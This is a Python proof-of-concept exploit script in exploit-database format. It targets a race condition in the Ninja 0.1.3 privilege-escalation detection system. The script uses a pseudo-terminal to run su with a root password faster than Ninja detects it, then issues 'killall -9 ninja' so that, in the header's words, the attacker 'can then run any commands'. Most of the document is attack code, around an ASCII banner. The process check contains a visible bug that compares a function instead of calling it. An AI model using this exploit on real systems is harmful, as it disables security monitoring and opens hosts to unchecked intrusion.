#[Title] Ninja privilege escalation detection and prevention system race condition #[Author] Ben 'highjack' Sheppard #[URL] http://highjack.github.io/ #[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. #It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. #The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. #[Software Link] http://forkbomb.org/ninja/ #[Date] 29/04/2015 #[Version] 0.1.3 #[Tested on] Kali Linux #[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg #See me hitting every open port, 'cause im banging on their system while I'm staying out of the court #https://www.youtube.com/watch?v=eA136fOsSeQ import pty, os, sys, subprocess pid, fd = pty.fork() #begin config user = "root" password = "mypassword" #change this :) command = "killall -9 ninja" #end config def usage(): print """ @@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@ @@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@ @@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@ !@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!! @!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@! !!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!! !!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!! :!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:! :: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: ::: : : : : :: :: : : : : : ::: : : : :: :: : : ::: [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition [Author] Ben 'highjack' Sheppard [URL] http://highjack.github.io/ [Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. """ executions = 0 def check_procs(): p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE) p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE) p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE) output = p3.communicate()[0] if output != "": if executions != 0: sys.exit(0) return True else: return False def kill_ninja(): if pid == 0: os.execvp("su", ["su", user, "-c", command]) elif pid > 0: try: os.read(fd, 1024) os.write(fd, password + "\n") os.read(fd,1024) os.wait() os.close(fd) except: usage() print "[+] Ninja is terminated" sys.exit(0) while True: kill_ninja() if (check_procs == True): executions = executions + 1 kill_ninja()